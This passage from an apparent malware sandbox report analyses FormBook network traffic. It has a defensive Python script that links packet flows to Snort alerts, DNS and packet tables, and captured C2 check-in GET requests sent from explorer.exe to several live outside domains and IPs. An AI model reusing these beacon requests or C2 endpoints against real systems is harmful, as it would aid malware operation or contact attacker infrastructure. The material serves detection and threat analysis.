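The Snort alerts and the packet list above together show the behaviour worth hunting for: seven short HTTP connections to seven different servers (ports 49717 through 49734) within about a minute, with the ET FormBook signatures matching only three of them. The script below is an added example, not part of the Joe Sandbox report, that rebuilds the per-connection view from such a packet list, joins the Snort alerts to it by 4-tuple and returns the timing chain. Its input is a constructed subset of rows from the two tables above in a " | " separated layout chosen for the example, and the 192.168.2. client prefix is an assumption taken from the report's analysis host address.

```python
from datetime import datetime, timedelta

# Constructed input: a subset of rows from this report's TCP Packets and Snort Alerts tables,
# fields separated by " | " (timestamp, source port, dest port, source IP, dest IP).
TCP_PACKETS = """\
Apr 8, 2021 12:04:21.632926941 CEST | 49717 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:04:21.808682919 CEST | 80 | 49717 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:04:21.809030056 CEST | 49717 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:04:22.203593016 CEST | 80 | 49717 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:04:32.389282942 CEST | 49718 | 80 | 192.168.2.5 | 35.156.117.131
Apr 8, 2021 12:04:32.447406054 CEST | 80 | 49718 | 35.156.117.131 | 192.168.2.5
Apr 8, 2021 12:04:59.106825113 CEST | 49725 | 80 | 192.168.2.5 | 208.91.197.91
Apr 8, 2021 12:04:59.252139091 CEST | 49725 | 80 | 192.168.2.5 | 208.91.197.91
Apr 8, 2021 12:04:59.644556999 CEST | 80 | 49725 | 208.91.197.91 | 192.168.2.5
"""

# Same layout for alerts: timestamp, protocol, SID, message, source port, dest port, source IP, dest IP.
SNORT_ALERTS = """\
04/08/21-12:04:21.809030 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 184.168.131.241
04/08/21-12:04:21.809030 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 184.168.131.241
04/08/21-12:04:59.252139 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 208.91.197.91
04/08/21-12:05:07.034640 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.5 | 8.8.8.8
"""


def parse_ts(text: str) -> datetime:
    """'Apr 8, 2021 12:04:21.632926941 CEST' -> datetime. strptime has no nanosecond
    directive, so the fraction is split off and truncated to microseconds."""
    head, tail = text.rsplit(".", 1)
    frac = tail.split()[0]
    return datetime.strptime(head, "%b %d, %Y %H:%M:%S") + timedelta(microseconds=int(frac[:6].ljust(6, "0")))


def reconstruct_flows(packet_text: str, client_prefix: str = "192.168.2.") -> dict:
    """Group packets into flows keyed (client, client_port, server, server_port),
    normalising direction so both halves of a conversation land on one key."""
    flows = {}
    for line in packet_text.strip().splitlines():
        ts, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
        t = parse_ts(ts)
        key = (sip, int(sport), dip, int(dport)) if sip.startswith(client_prefix) else (dip, int(dport), sip, int(sport))
        f = flows.setdefault(key, {"first": t, "last": t, "packets": 0, "sids": set()})
        f["first"], f["last"], f["packets"] = min(f["first"], t), max(f["last"], t), f["packets"] + 1
    return flows


def attach_alerts(flows: dict, alert_text: str) -> dict:
    """Tag each flow with the Snort SIDs that fired on it, matched by 4-tuple."""
    for line in alert_text.strip().splitlines():
        _ts, proto, sid, _msg, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
        if proto != "TCP":          # ICMP alerts carry no ports and belong to no TCP flow
            continue
        key = (sip, int(sport), dip, int(dport))
        if key in flows:
            flows[key]["sids"].add(int(sid))
    return flows


def checkin_timeline(flows: dict, server_port: int = 80) -> list:
    """One row per client->server_port flow in start order, with packet count, duration,
    gap since the previous flow and the SIDs that matched. A beacon walking a C2/decoy
    list shows up as a chain of short flows to distinct hosts seconds apart, whether or
    not an IDS signature matched each individual request."""
    rows, prev = [], None
    for key, f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        if key[3] != server_port:
            continue
        rows.append({
            "server": key[2], "client_port": key[1], "packets": f["packets"],
            "duration_s": round((f["last"] - f["first"]).total_seconds(), 3),
            "gap_s": round((f["first"] - prev).total_seconds(), 3) if prev else 0.0,
            "sids": sorted(f["sids"]),
        })
        prev = f["first"]
    return rows


if __name__ == "__main__":
    for row in checkin_timeline(attach_alerts(reconstruct_flows(TCP_PACKETS), SNORT_ALERTS)):
        print(row)
```

On the full tables the same three functions yield seven rows, gaps of roughly 5 to 27 seconds and SIDs on only the 49717, 49725 and 49732 flows; the unalerted rows are the ones a detection built on the timing chain rather than on request content would still catch.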

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 12:03:15.073683977 CEST | 52212 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:15.107563019 CEST | 53 | 52212 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:15.243592978 CEST | 54302 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:15.256288052 CEST | 53 | 54302 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:15.258438110 CEST | 53784 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:15.270612955 CEST | 53 | 53784 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:15.706372976 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:15.719813108 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:15.722573042 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:15.736054897 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:16.338979006 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:16.351699114 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:18.154172897 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:18.167529106 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:18.795605898 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:18.808784962 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:19.236841917 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:19.254936934 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:19.832006931 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:19.844795942 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:20.705095053 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:20.717613935 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:21.448858023 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:21.461405039 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:22.880736113 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:22.893364906 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:25.878978014 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:25.891555071 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:26.643290043 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:26.656200886 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:27.609880924 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:27.623181105 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:44.317714930 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:44.336030960 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:49.234772921 CEST | 59736 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:49.239942074 CEST | 51058 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:49.240032911 CEST | 52636 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:03:49.247836113 CEST | 53 | 59736 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:49.251970053 CEST | 53 | 51058 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:03:49.253436089 CEST | 53 | 52636 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:08.718833923 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:08.732348919 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:21.582397938 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:21.624262094 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:32.059622049 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:32.387444973 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:37.486022949 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:37.528493881 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:42.619398117 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:42.979065895 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:48.228594065 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:48.836759090 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:51.358530045 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:51.371253967 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:53.898787022 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:53.926758051 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:04:58.948373079 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:04:59.105505943 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:03.749087095 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:03.768049955 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:04.512552977 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:05.506127119 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:06.521694899 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:06.674634933 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:07.034513950 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:08.358870983 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:11.724265099 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:11.765930891 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:17.043440104 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:17.880172968 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:18.316375971 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:18.349823952 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:23.309679031 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:23.336853981 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:27.472863913 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:27.485549927 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:28.296029091 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:28.329763889 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:28.497765064 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:28.774436951 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:05:34.462431908 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:05:34.527434111 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5

                                                                            ICMP Packets

                                                                            Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                                                            Apr 8, 2021 12:05:07.034640074 CEST | 192.168.2.5 | 8.8.8.8 | cffd | (Port unreachable) | Destination Unreachable
                                                                            Apr 8, 2021 12:05:08.358998060 CEST | 192.168.2.5 | 8.8.8.8 | cffd | (Port unreachable) | Destination Unreachable

                                                                            DNS Queries

                                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                            Apr 8, 2021 12:04:21.582397938 CEST | 192.168.2.5 | 8.8.8.8 | 0x3722 | Standard query (0) | www.flowhcf.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:32.059622049 CEST | 192.168.2.5 | 8.8.8.8 | 0x5ca1 | Standard query (0) | www.jinlan.online | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:37.486022949 CEST | 192.168.2.5 | 8.8.8.8 | 0xc2f0 | Standard query (0) | www.armaccountingbs.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:42.619398117 CEST | 192.168.2.5 | 8.8.8.8 | 0xe949 | Standard query (0) | www.zmid.xyz | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:48.228594065 CEST | 192.168.2.5 | 8.8.8.8 | 0x6c76 | Standard query (0) | www.sookepointcargo.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:53.898787022 CEST | 192.168.2.5 | 8.8.8.8 | 0x6c6d | Standard query (0) | www.dateyourlovelive.club | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:58.948373079 CEST | 192.168.2.5 | 8.8.8.8 | 0x5abb | Standard query (0) | www.knoxvilleoutdoorkitchens.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:04.512552977 CEST | 192.168.2.5 | 8.8.8.8 | 0x2ea | Standard query (0) | www.gunungbatufrozen.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:05.506127119 CEST | 192.168.2.5 | 8.8.8.8 | 0x2ea | Standard query (0) | www.gunungbatufrozen.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:06.521694899 CEST | 192.168.2.5 | 8.8.8.8 | 0x2ea | Standard query (0) | www.gunungbatufrozen.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:11.724265099 CEST | 192.168.2.5 | 8.8.8.8 | 0x9951 | Standard query (0) | www.highdeserthealthinsurance.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:17.043440104 CEST | 192.168.2.5 | 8.8.8.8 | 0x52bd | Standard query (0) | www.hotelmaktub.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:23.309679031 CEST | 192.168.2.5 | 8.8.8.8 | 0x2d71 | Standard query (0) | www.legacyadmin.support | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:28.497765064 CEST | 192.168.2.5 | 8.8.8.8 | 0x9df1 | Standard query (0) | www.arizonagridiron.com | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.462431908 CEST | 192.168.2.5 | 8.8.8.8 | 0x8974 | Standard query (0) | www.harshdeepfashion.com | A (IP address) | IN (0x0001)

                                                                            DNS Answers

                                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                            Apr 8, 2021 12:04:21.624262094 CEST | 8.8.8.8 | 192.168.2.5 | 0x3722 | No error (0) | www.flowhcf.com | flowhcf.com | | CNAME (Canonical name) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:21.624262094 CEST | 8.8.8.8 | 192.168.2.5 | 0x3722 | No error (0) | flowhcf.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:32.387444973 CEST | 8.8.8.8 | 192.168.2.5 | 0x5ca1 | No error (0) | www.jinlan.online | www.jinlan.online.s.strikinglydns.com | | CNAME (Canonical name) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:32.387444973 CEST | 8.8.8.8 | 192.168.2.5 | 0x5ca1 | No error (0) | www.jinlan.online.s.strikinglydns.com | | 35.156.117.131 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:32.387444973 CEST | 8.8.8.8 | 192.168.2.5 | 0x5ca1 | No error (0) | www.jinlan.online.s.strikinglydns.com | | 18.157.120.97 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:37.528493881 CEST | 8.8.8.8 | 192.168.2.5 | 0xc2f0 | No error (0) | www.armaccountingbs.com | armaccountingbs.com | | CNAME (Canonical name) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:37.528493881 CEST | 8.8.8.8 | 192.168.2.5 | 0xc2f0 | No error (0) | armaccountingbs.com | | 2.57.90.16 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:42.979065895 CEST | 8.8.8.8 | 192.168.2.5 | 0xe949 | No error (0) | www.zmid.xyz | ghs.google.com | | CNAME (Canonical name) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:48.836759090 CEST | 8.8.8.8 | 192.168.2.5 | 0x6c76 | Server failure (2) | www.sookepointcargo.com | none | none | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:53.926758051 CEST | 8.8.8.8 | 192.168.2.5 | 0x6c6d | Name error (3) | www.dateyourlovelive.club | none | none | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:04:59.105505943 CEST | 8.8.8.8 | 192.168.2.5 | 0x5abb | No error (0) | www.knoxvilleoutdoorkitchens.com | | 208.91.197.91 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:06.674634933 CEST | 8.8.8.8 | 192.168.2.5 | 0x2ea | Server failure (2) | www.gunungbatufrozen.com | none | none | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:07.034513950 CEST | 8.8.8.8 | 192.168.2.5 | 0x2ea | Server failure (2) | www.gunungbatufrozen.com | none | none | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:08.358870983 CEST | 8.8.8.8 | 192.168.2.5 | 0x2ea | Server failure (2) | www.gunungbatufrozen.com | none | none | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:11.765930891 CEST | 8.8.8.8 | 192.168.2.5 | 0x9951 | No error (0) | www.highdeserthealthinsurance.com | | 74.208.236.64 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:17.880172968 CEST | 8.8.8.8 | 192.168.2.5 | 0x52bd | No error (0) | www.hotelmaktub.com | hotelmaktub.com | | CNAME (Canonical name) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:17.880172968 CEST | 8.8.8.8 | 192.168.2.5 | 0x52bd | No error (0) | hotelmaktub.com | | 177.55.108.130 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:17.880172968 CEST | 8.8.8.8 | 192.168.2.5 | 0x52bd | No error (0) | hotelmaktub.com | | 187.84.225.36 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:23.336853981 CEST | 8.8.8.8 | 192.168.2.5 | 0x2d71 | No error (0) | www.legacyadmin.support | legacyadmin.support | | CNAME (Canonical name) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:23.336853981 CEST | 8.8.8.8 | 192.168.2.5 | 0x2d71 | No error (0) | legacyadmin.support | | 192.0.78.24 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:23.336853981 CEST | 8.8.8.8 | 192.168.2.5 | 0x2d71 | No error (0) | legacyadmin.support | | 192.0.78.25 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:28.774436951 CEST | 8.8.8.8 | 192.168.2.5 | 0x9df1 | No error (0) | www.arizonagridiron.com | | 23.27.42.72 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.527434111 CEST | 8.8.8.8 | 192.168.2.5 | 0x8974 | No error (0) | www.harshdeepfashion.com | | 216.239.34.21 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.527434111 CEST | 8.8.8.8 | 192.168.2.5 | 0x8974 | No error (0) | www.harshdeepfashion.com | | 216.239.36.21 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.527434111 CEST | 8.8.8.8 | 192.168.2.5 | 0x8974 | No error (0) | www.harshdeepfashion.com | | 216.239.38.21 | A (IP address) | IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.527434111 CEST | 8.8.8.8 | 192.168.2.5 | 0x8974 | No error (0) | www.harshdeepfashion.com | | 216.239.32.21 | A (IP address) | IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.flowhcf.com
                                                                            • www.jinlan.online
                                                                            • www.armaccountingbs.com
                                                                            • www.knoxvilleoutdoorkitchens.com
                                                                            • www.highdeserthealthinsurance.com
                                                                            • www.hotelmaktub.com
                                                                            • www.legacyadmin.support

                                                                            HTTP Packets

                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            0 | 192.168.2.5 | 49717 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Apr 8, 2021 12:04:21.809030056 CEST | 1544 | OUT | GET /e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO HTTP/1.1
                                                                            Host: www.flowhcf.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:04:22.028017998 CEST | 1545 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.16.1
                                                                            Date: Thu, 08 Apr 2021 10:04:21 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: http://www.flowhcf.org/e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            1 | 192.168.2.5 | 49718 | 35.156.117.131 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Apr 8, 2021 12:04:32.408296108 CEST | 1545 | OUT | GET /e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X HTTP/1.1
                                                                            Host: www.jinlan.online
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            2 | 192.168.2.5 | 49719 | 2.57.90.16 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Apr 8, 2021 12:04:37.571713924 CEST | 1546 | OUT | GET /e3rs/?w0G=UjY/ETYDec4qhoizf7RP+uVqhCLoGuhip7tAF9t9xQZdbBeLWBLuGPY37yNXVCM5GTyP&uFQl=XP7HMT_8 HTTP/1.1
                                                                            Host: www.armaccountingbs.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:04:37.611836910 CEST | 1547 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.16.1
                                                                            Date: Thu, 08 Apr 2021 10:04:37 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 153
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            3 | 192.168.2.5 | 49725 | 208.91.197.91 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Apr 8, 2021 12:04:59.252139091 CEST | 1646 | OUT | GET /e3rs/?w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ/wFsHy6lqdqQBlr0&uFQl=XP7HMT_8 HTTP/1.1
                                                                            Host: www.knoxvilleoutdoorkitchens.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:04:59.498363972 CEST | 1648 | IN | HTTP/1.1 200 OK
                                                                            Date: Thu, 08 Apr 2021 10:04:59 GMT
                                                                            Server: Apache
                                                                            Set-Cookie: vsid=926vr3654218993933208; expires=Tue, 07-Apr-2026 10:04:59 GMT; Max-Age=157680000; path=/; domain=www.knoxvilleoutdoorkitchens.com; HttpOnly
                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_jc9joRJOg7xepppfUjhgNUfaQZzFQ8rnfCxQRWJh90VSrWOsDLcYcPwxAW8oD+eV6/1Kf7dQa9exp2BXhMPJvQ==
                                                                            Content-Length: 2723
                                                                            Keep-Alive: timeout=5, max=123
                                                                            Connection: Keep-Alive
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Data Ascii: ...top.location="http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8g7L5cMHgo2Y50rQqOKciNr6lrbchkDznoHYSaeq5%2FiEbVQOvlSQ3Kpj7OPcI8UAOHekkqz3QH1vKMsYzdqTWlRfeRnfpqsD%2BvL0m%2BhaiDwsouBNWAzdP%2FYhQXIv8ZUvJBlVYQnrDymD&prvtof=xJ4CtZ14NrKrwslR1dXMK80crXjWF7sKhkbZ4GN9BxE%3D&poru=NbVrikyis4az%2BtbStQEdDui22ZRFxc6qVqYbkI6OLT08djTJ9qy1frXU9SVMf99KLB9go4l0rF8At%2BiABq%2FjdCdQJdp0pbo0K4GuxELUeyoS5wudJDkPDf3JpYf2ACaGx6K1QZdQ184F%2B5LiFa0mcxRUvrGYJ7xBYWyzBQ%2Feyy7w%2F23wOTKuBfzEFwa74VuW0Spc6YCoMI6ENrDkwgU3hg%3D%3D&cifr=1&w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ%2FwFsHy6lqdqQBlr0&uFQl=XP7HMT_8";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            4 | 192.168.2.5 | 49731 | 74.208.236.64 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Apr 8, 2021 12:05:11.900079012 CEST | 5238 | OUT | GET /e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8 HTTP/1.1
                                                                            Host: www.highdeserthealthinsurance.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:05:12.034537077 CEST | 5238 | IN | HTTP/1.1 302 Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Date: Thu, 08 Apr 2021 10:05:11 GMT
                                                                            Server: Apache/2.4.10 (Debian)
                                                                            Cache-Control: no-cache
                                                                            Location: http://raygemme.com/e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            5 | 192.168.2.5 | 49732 | 177.55.108.130 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Apr 8, 2021 12:05:18.088413954 CEST | 5243 | OUT | GET /e3rs/?uFQl=XP7HMT_8&w0G=Ok77fVcdVMfIiR4pMXON/NN29f2Jfu2AMoU186FmLUOu6U92Y3SpeQqKBhzvmDYI2dCa HTTP/1.1
                                                                            Host: www.hotelmaktub.com
